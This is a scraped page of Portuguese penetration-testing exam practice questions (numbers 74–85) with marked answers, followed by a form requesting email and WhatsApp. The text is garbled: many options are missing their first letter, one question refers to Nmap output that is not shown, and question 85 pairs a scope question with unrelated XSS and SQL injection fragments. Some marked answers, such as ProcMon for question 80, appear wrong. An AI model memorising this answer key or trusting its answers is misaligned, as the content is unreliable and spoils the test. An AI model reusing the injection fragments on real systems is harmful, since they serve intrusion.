B. sobre
C. informação
D. home
Ver resposta
Resposta correta: B
Pergunta #74
Um técnico de testes de penetração está à procura de uma vulnerabilidade que permita aos atacantes abrir portas através de um serviço TCP especializado que é utilizado para um sistema de controlo de acesso físico. O serviço existe em mais de 100 hosts diferentes, portanto o testador gostaria de automatizar a avaliação. A identificação exige que o testador de penetração:-Tenha uma conexão TCP completa-Envie um payload `hello'-Espere por uma resposta-Envie uma cadeia de caracteres com mais de 16 bytesQual das seguintes abordagens seria a MELHOR para apoiar o objetivo?
A. Executar nmap -Pn -sV --script vuln
B. Empregar um exame simples do OpenVAS contra a porta TCP do anfitrião
C. riar um script na linguagem Lua e utilizá-lo com o NSE
D. Efetuar uma análise credenciada com o Nessus
Ver resposta
Resposta correta: C
Pergunta #75
O PCI DSS exige qual das seguintes opções como parte do processo de teste de penetração?
A. testador de penetração deve ter certificações de cibersegurança
B. A rede deve ser segmentada
C. Apenas os sistemas virados para o exterior devem ser testados
D. A avaliação deve ser efectuada fora do horário de trabalho
Ver resposta
Resposta correta: B
Pergunta #76
Qual dos seguintes protocolos ou tecnologias oferece proteção de confidencialidade em trânsito para o envio por correio eletrónico do relatório final de avaliação da segurança?
A. /MIME
B. FTPS
C. NSSEC
D. S2
Ver resposta
Resposta correta: A
Pergunta #77
Um consultor acabou de efetuar um scan SYN de todas as portas abertas num anfitrião remoto e precisa agora de identificar remotamente o tipo de serviços que estão a ser executados no anfitrião. Qual das seguintes é uma ferramenta de reconhecimento ativo que seria a MELHOR a utilizar para realizar esta tarefa?
A. cpdump
B. Snort
C. map
D. etstat
E. Fuzzer
Ver resposta
Resposta correta: C
Pergunta #78
Um testador de penetração recebe os seguintes resultados de uma varredura do Nmap: Qual dos seguintes sistemas operacionais o alvo MAIS provavelmente está executando?
A. CentOS
B. Arch Linux
C. Servidor Windows
D. Ubuntu
Ver resposta
Resposta correta: C
Pergunta #79
Executar um scanner de vulnerabilidades num segmento de rede híbrido que inclui servidores de TI gerais e sistemas de controlo industrial:
A. evelará vulnerabilidades no protocolo Modbus
B. podem provocar falhas involuntárias nos sistemas de controlo
C. ode reduzir a taxa de resultados positivos verdadeiros
D. riará uma condição de negação de serviço nas redes IP
Ver resposta
Resposta correta: B
Pergunta #80
Um testador de penetração obteve acesso ao shell de um host Windows e deseja executar um binário especialmente criado para execução posterior usando a função de criação de chamada de processo ymic.exe. Qual dos seguintes mecanismos do SO ou do sistema de ficheiros é MAIS provável que suporte este objetivo?
A. Fluxos de dados alternativos
B. Módulos do PowerShell
C. steganografia MP4
D. ProcMon
Ver resposta
Resposta correta: D
Pergunta #81
O diretor executivo de uma empresa criou um escritório secundário em casa e está preocupado com o facto de o serviço WiFi que está a ser utilizado ser vulnerável a um ataque. É contratado um técnico de testes de penetração para testar a segurança do router WiFi. Qual das seguintes opções é MAIS vulnerável a um ataque de força bruta?
A. PS
B. PA2-EAP
C. PA-TKIP
D. PA2-PSK
Ver resposta
Resposta correta: A
Pergunta #82
Num repositório de ficheiros de rede desprotegido, um testador de penetração descobre um ficheiro de texto que contém nomes de utilizador e palavras-passe em texto não encriptado e uma folha de cálculo que contém dados de 50 funcionários, incluindo nomes completos, funções e números de série. O testador percebe que algumas das senhas no arquivo de texto seguem o formato: . Qual das seguintes seria a melhor ação para o testador tomar PRÓXIMO com essas informações?
A. riar um dicionário de palavras-passe personalizado como preparação para o teste de pulverização de palavras-passe
B. Recomendar a utilização de um gestor/cofre de senhas em vez de ficheiros de texto para armazenar senhas de forma segura
C. Recomendar a configuração de regras de complexidade das palavras-passe em todos os sistemas e aplicações
D. ocumentar o repositório de ficheiros desprotegidos como uma descoberta no relatório de testes de penetração
Ver resposta
Resposta correta: D
Pergunta #83
Um testador de penetração inicia sessão como um utilizador no ambiente de nuvem de uma empresa. Qual dos seguintes módulos do Pacu permitirá ao testador determinar o nível de acesso do utilizador existente?
A. am_enum_permissions
B. am_prive_sc_scan
C. am_backdoor_assume_role
D. am_bruteforce_permissions
Ver resposta
Resposta correta: A
Pergunta #84
Um técnico de testes de penetração precisa de efetuar uma análise de vulnerabilidades a um servidor Web. Qual das seguintes ferramentas é mais provável que o testador escolha?
A. Nmap
B. ikto
C. aim e Abel
D. thercap
Ver resposta
Resposta correta: B
Pergunta #85
Durante um teste de penetração, os nomes de domínio, os intervalos de IP, os anfitriões e as aplicações são definidos no:
A. script>var adr = '
B.
C. var/www/html/index
D. UNION SELECT 1, BASE DE DADOS (), 3 --
Ver resposta
Resposta correta: C

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: